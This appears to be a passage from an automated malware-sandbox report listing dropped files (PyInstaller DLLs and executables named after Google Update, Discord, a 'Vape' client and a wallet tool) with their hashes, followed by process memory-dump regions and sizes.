faa484379f4d6f6e33cbb4400df16a8e4308a4b8d5b9d2650738289d856b37ea

SHA512
27f3e8e9517d0cd8c536be801d61193cf7f4e3edbca7f9f6211d2402d620999b290f333e47ac5264a72fa50cae4d099d9f9d041547373c6228f5fdae5b945cd8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26722\libcrypto-3.dll
Filesize
1.6MB

MD5
78ebd9cb6709d939e4e0f2a6bbb80da9

SHA1
ea5d7307e781bc1fa0a2d098472e6ea639d87b73

SHA256
6a8c458e3d96f8dd3bf6d3cacc035e38edf7f127eee5563b51f8c8790ced0b3e

SHA512
b752769b3de4b78905b0326b5270091642ac89ff204e9e4d78670791a1fa211a54d777aeef59776c21f854c263add163adaef6a81b166190518cfaaf4e2e4122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26722\libffi-8.dll
Filesize
29KB

MD5
08b000c3d990bc018fcb91a1e175e06e

SHA1
bd0ce09bb3414d11c91316113c2becfff0862d0d

SHA256
135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

SHA512
8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26722\libssl-3.dll
Filesize
223KB

MD5
bf4a722ae2eae985bacc9d2117d90a6f

SHA1
3e29de32176d695d49c6b227ffd19b54abb521ef

SHA256
827fdb184fdcde9223d09274be780fe4fe8518c15c8fc217748ad5fd5ea0f147

SHA512
dd83b95967582152c7b5581121e6b69a07073e7a76fe87975742bb0fd7ecef7494ec940dba914364034cc4e3f623be98cc887677b65c208f14a2a9fc7497ca73

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26722\python311.dll
Filesize
1.6MB

MD5
5f6fd64ec2d7d73ae49c34dd12cedb23

SHA1
c6e0385a868f3153a6e8879527749db52dce4125

SHA256
ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967

SHA512
c4be2d042c6e4d22e46eacfd550f61b8f55814bfe41d216a4df48382247df70bc63151068513855aa78f9b3d2f10ba6a824312948324c92de6dd0f6af414e8ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26722\select.pyd
Filesize
25KB

MD5
45d5a749e3cd3c2de26a855b582373f6

SHA1
90bb8ac4495f239c07ec2090b935628a320b31fc

SHA256
2d15c2f311528440aa29934920fb0b015eaf8cbe3b3c9ad08a282a2d6ba68876

SHA512
c7a641d475a26712652a84b8423155ca347e0ec0155bd257c200225a64752453e4763b8885d8fb043b30e92ae023a501fff04777ba5cfe54da9a68071f25fbea

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26722\sqlite3.dll
Filesize
622KB

MD5
dbc64142944210671cca9d449dab62e6

SHA1
a2a2098b04b1205ba221244be43b88d90688334c

SHA256
6e6b6f7df961c119692f6c1810fbfb7d40219ea4e5b2a98c413424cf02dce16c

SHA512
3bff546482b87190bb2a499204ab691532aa6f4b4463ab5c462574fc3583f9fc023c1147d84d76663e47292c2ffc1ed1cb11bdb03190e13b6aa432a1cef85c4b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI26722\ucrtbase.dll
Filesize
987KB

MD5
7dbabe7756944f6c3d402e97ff900499

SHA1
a562a5c60bf39cad84f11cafec0c5c3b09c56689

SHA256
616d70b2d1518408eb17c610e459ff75d4738ade33a5879667463f08677c1d55

SHA512
a65c555fe917cf91f69781ec89269a35ae9d3b406cebdf207e27e353b5246c3d9bd25d1a8b1664140e61bd4e2aa882d196fd2a6f9073f9b7ac3a8246a953eca8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wwsk4xtr.c5q.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\GoogleUpdateCore.exe
Filesize
73KB

MD5
2a03cc379e8f31e0fb2f4669c1b9c2c0

SHA1
59b8d7736a84ff2a185483d9c75f8dd1d6b4ed2e

SHA256
d21522ca5d8dec817094e7d60e8dc56c7906a3d79dba9fefd2473921900536f0

SHA512
f2a35d353a323dac337fd6da744c8e3468af1c24c03dd61cfdd9f51e63c95d352005532093ae99bea4effb677bd9028bf779ed6f86219de372f4d342f68fd0ef

Download Submit
C:\Users\Admin\AppData\Roaming\Vape Updated.exe
Filesize
35.8MB

MD5
e322dbd089090cad02ad4906ba8a5356

SHA1
d92efd01d71fa0cf9a8686a73451f9daff27c501

SHA256
e663841436f17e129953713cb424ab81aa938fe665918447d36238ff343ed589

SHA512
1b09c2c65c7d84669d464e8c6036f29cee23c47b8f1371ce449277f21f27c751dcd34ac94f64f58d9e4e59fa37e276b8c41e7d827b421ef9ea4536bb8cbce66f

Download Submit
C:\Users\Admin\AppData\Roaming\Vape.exe
Filesize
26.2MB

MD5
791c3bf66c8a105074b9fc0661900fae

SHA1
4f14127b9b75eedff2ca01a6802cdab0135f6824

SHA256
d106a7d59ca96b1ab6453779b4c776a8a1eb50c18301cfea74d8dffc58918ce4

SHA512
b20b2960249c9e0104156daaa214ca2455bff03106081d85eee6f98962ce1e08d80198174ac8ca4e5afa1260b1cacdb7f895f453af20b9b4fd7230f91bcacb51

Download Submit
C:\Users\Admin\AppData\Roaming\VapeV4.exe
Filesize
35.9MB

MD5
ba485001338d6de9fa22f48b35d5ae3f

SHA1
463827aa0747220e3580aa7253188ab5c820e2c2

SHA256
b544f8c440fdec72dee17093cb1bba576ca9508928e807017cbba30a14c54722

SHA512
29675e1b5084fbce792d20260121e6d9284c0cc5005f83b111fb9104f050a86d274c215fdeb9cfd928464c3949b3842741c8ff7831970749fb03ef9591e084aa

Download Submit
C:\Users\Admin\AppData\Roaming\WAlletsd.exe
Filesize
9.6MB

MD5
8d36f5e077cdae092a45078d84897031

SHA1
32b94790f988c031ac06db18fd9bf9e90c6d9a2e

SHA256
164bff0c7dfda91f8fb38b8d77e90de002678adaeb17419f48366097fcd8d54e

SHA512
83b0f60134b6598e52ecad8540f0d316d3a2b300b3ade0968c5bdef782ed134300bec991e4280692cf7c89e40ac93a802b234113bc5c991dd8436c1caa1d0545

Download Submit
C:\Users\Admin\AppData\Roaming\discord.exe
Filesize
90KB

MD5
4aac4a3a51dc946c49fe38f142539308

SHA1
4e7e7e993e092d8ad0fbe4852ccb116abda8b3a0

SHA256
a69841a608fc2a280d501c4e42ae6c6ce7a2cd5bd0db480dcce9df89a78f739e

SHA512
80b72a86aea8e0583d336cdbf50ce883053b624d8bb7ee4db2224625ebddd9a5acc32ac03976891eff56dd1e62151d41fbfe7b594110b0601f2db05c2f8a1d59

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 235853.crdownload
Filesize
36.0MB

MD5
feb087808958828564c3f63115056652

SHA1
aa7da658d1720bb04c4f48bd48c96c2b203007b6

SHA256
7db2f1b8447c7724e0b312fb2a9cc177807d72d44cec68e12aef49b3990b1c29

SHA512
82e2ee2059895539b7407f5f16cd8dc278cfa334e7774e819544e0f5cd00002910a1dfd745a89c6a22dd683d04fe2ac45f82587fdb11d1efddb1c6bff2855ea5

Download Submit
\??\pipe\LOCAL\crashpad_3512_SQDFBPEUMAVQGYWG
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/668-718-0x00007FF792020000-0x00007FF7929B6000-memory.dmp

Filesize
9.6MB

Download
memory/668-710-0x00007FF792020000-0x00007FF7929B6000-memory.dmp

Filesize
9.6MB

Download
memory/668-638-0x00007FF792020000-0x00007FF7929B6000-memory.dmp

Filesize
9.6MB

Download
memory/1124-200-0x00000000008C0000-0x0000000002CB0000-memory.dmp

Filesize
35.9MB

Download
memory/1124-216-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmp

Filesize
10.8MB

Download
memory/1124-198-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmp

Filesize
10.8MB

Download
memory/2316-311-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmp

Filesize
10.8MB

Download
memory/2316-219-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmp

Filesize
10.8MB

Download
memory/2316-220-0x0000021E37080000-0x0000021E37090000-memory.dmp

Filesize
64KB

Download
memory/2316-221-0x0000021E37080000-0x0000021E37090000-memory.dmp

Filesize
64KB

Download
memory/2316-231-0x0000021E4F800000-0x0000021E4F822000-memory.dmp

Filesize
136KB

Download
memory/2764-550-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmp

Filesize
10.8MB

Download
memory/2764-551-0x000001989D990000-0x000001989D9A0000-memory.dmp

Filesize
64KB

Download
memory/2832-432-0x000002B3F7E60000-0x000002B3F7E70000-memory.dmp

Filesize
64KB

Download
memory/2832-414-0x000002B3F7E60000-0x000002B3F7E70000-memory.dmp

Filesize
64KB

Download
memory/2832-435-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmp

Filesize
10.8MB

Download
memory/3584-400-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmp

Filesize
10.8MB

Download
memory/3584-412-0x000001882CF70000-0x000001882CF80000-memory.dmp

Filesize
64KB

Download
memory/3584-401-0x000001882CF70000-0x000001882CF80000-memory.dmp

Filesize
64KB

Download
memory/3584-589-0x000001882CF70000-0x000001882CF80000-memory.dmp

Filesize
64KB

Download
memory/3652-382-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmp

Filesize
10.8MB

Download
memory/3652-379-0x0000020D1FAE0000-0x0000020D1FAF0000-memory.dmp

Filesize
64KB

Download
memory/3652-402-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmp

Filesize
10.8MB

Download
memory/4556-202-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmp

Filesize
10.8MB

Download
memory/4556-362-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmp

Filesize
10.8MB

Download
memory/4916-499-0x00000274212D0000-0x00000274212E0000-memory.dmp

Filesize
64KB

Download
memory/4916-498-0x00000274212D0000-0x00000274212E0000-memory.dmp

Filesize
64KB

Download
memory/4916-497-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmp

Filesize
10.8MB

Download
memory/4944-548-0x0000019E62C70000-0x0000019E62C80000-memory.dmp

Filesize
64KB

Download
memory/4944-549-0x0000019E62C70000-0x0000019E62C80000-memory.dmp

Filesize
64KB

Download
memory/4944-547-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmp

Filesize
10.8MB

Download
memory/5292-413-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmp

Filesize
10.8MB

Download
memory/5372-346-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmp

Filesize
10.8MB

Download
memory/5372-217-0x0000000000D70000-0x000000000314A000-memory.dmp

Filesize
35.9MB

Download
memory/5372-215-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmp

Filesize
10.8MB

Download
memory/5452-539-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmp

Filesize
10.8MB

Download
memory/5452-345-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmp

Filesize
10.8MB

Download
memory/5452-344-0x0000000000970000-0x000000000098E000-memory.dmp

Filesize
120KB

Download
memory/5608-383-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmp

Filesize
10.8MB

Download
memory/5608-184-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmp

Filesize
10.8MB

Download
memory/5608-185-0x0000000000B80000-0x0000000000B98000-memory.dmp

Filesize
96KB

Download
memory/5728-171-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmp

Filesize
10.8MB

Download
memory/5728-172-0x00000000004E0000-0x00000000028E6000-memory.dmp

Filesize
36.0MB

Download
memory/5728-199-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmp

Filesize
10.8MB

Download
memory/5828-561-0x00007FFAF13D0000-0x00007FFAF1403000-memory.dmp

Filesize
204KB

Download
memory/5828-363-0x00007FFAF1870000-0x00007FFAF189D000-memory.dmp

Filesize
180KB

Download
memory/5828-380-0x00007FFAF1410000-0x00007FFAF1429000-memory.dmp

Filesize
100KB

Download
memory/5828-546-0x00007FFADECF0000-0x00007FFADF210000-memory.dmp

Filesize
5.1MB

Download
memory/5828-381-0x00007FFB06150000-0x00007FFB0615D000-memory.dmp

Filesize
52KB

Download
memory/5828-378-0x00007FFAF1300000-0x00007FFAF13CD000-memory.dmp

Filesize
820KB

Download
memory/5828-376-0x00007FFADECF0000-0x00007FFADF210000-memory.dmp

Filesize
5.1MB

Download
memory/5828-320-0x00007FFADDA00000-0x00007FFADDFE9000-memory.dmp

Filesize
5.9MB

Download
memory/5828-374-0x00007FFAF15B0000-0x00007FFAF15D3000-memory.dmp

Filesize
140KB

Download
memory/5828-375-0x00007FFAF13D0000-0x00007FFAF1403000-memory.dmp

Filesize
204KB

Download
memory/5828-385-0x00007FFB05FD0000-0x00007FFB05FDD000-memory.dmp

Filesize
52KB

Download
memory/5828-398-0x00007FFAEEC40000-0x00007FFAEED5C000-memory.dmp

Filesize
1.1MB

Download
memory/5828-338-0x00007FFAF1DC0000-0x00007FFAF1DE3000-memory.dmp

Filesize
140KB

Download
memory/5828-562-0x00007FFAF1300000-0x00007FFAF13CD000-memory.dmp

Filesize
820KB

Download
memory/5828-360-0x00007FFAF1430000-0x00007FFAF15A7000-memory.dmp

Filesize
1.5MB

Download
memory/5828-342-0x00007FFB06160000-0x00007FFB0616F000-memory.dmp

Filesize
60KB

Download
memory/5828-853-0x00007FFAF1DC0000-0x00007FFAF1DE3000-memory.dmp

Filesize
140KB

Download
memory/5828-858-0x00007FFAF1430000-0x00007FFAF15A7000-memory.dmp

Filesize
1.5MB

Download
memory/5828-366-0x00007FFAF1850000-0x00007FFAF1869000-memory.dmp

Filesize
100KB

Download
memory/5828-610-0x00007FFADDA00000-0x00007FFADDFE9000-memory.dmp

Filesize
5.9MB

Download
memory/5828-852-0x00007FFADDA00000-0x00007FFADDFE9000-memory.dmp

Filesize
5.9MB

Download
memory/5828-484-0x00007FFAF1DC0000-0x00007FFAF1DE3000-memory.dmp

Filesize
140KB

Download
memory/5828-637-0x00007FFAEEC40000-0x00007FFAEED5C000-memory.dmp

Filesize
1.1MB

Download
memory/5828-695-0x00007FFADDA00000-0x00007FFADDFE9000-memory.dmp

Filesize
5.9MB

Download
memory/5828-434-0x00007FFADDA00000-0x00007FFADDFE9000-memory.dmp

Filesize
5.9MB

Download
memory/5828-384-0x00007FFAF12C0000-0x00007FFAF12D4000-memory.dmp

Filesize
80KB

Download
memory/6196-867-0x00007FF6B2640000-0x00007FF6B2FD6000-memory.dmp

Filesize
9.6MB

Download
memory/6196-907-0x00007FF6B2640000-0x00007FF6B2FD6000-memory.dmp

Filesize
9.6MB

Download
memory/6464-588-0x000001783EA20000-0x000001783EA30000-memory.dmp

Filesize
64KB

Download
memory/6464-587-0x000001783EA20000-0x000001783EA30000-memory.dmp

Filesize
64KB

Download
memory/6464-577-0x00007FFAF0570000-0x00007FFAF1031000-memory.dmp

Filesize
10.8MB

Download
memory/6920-629-0x000002BC89830000-0x000002BC89831000-memory.dmp

Filesize
4KB

Download
memory/7120-908-0x00000000011A0000-0x00000000011C0000-memory.dmp

Filesize
128KB

Download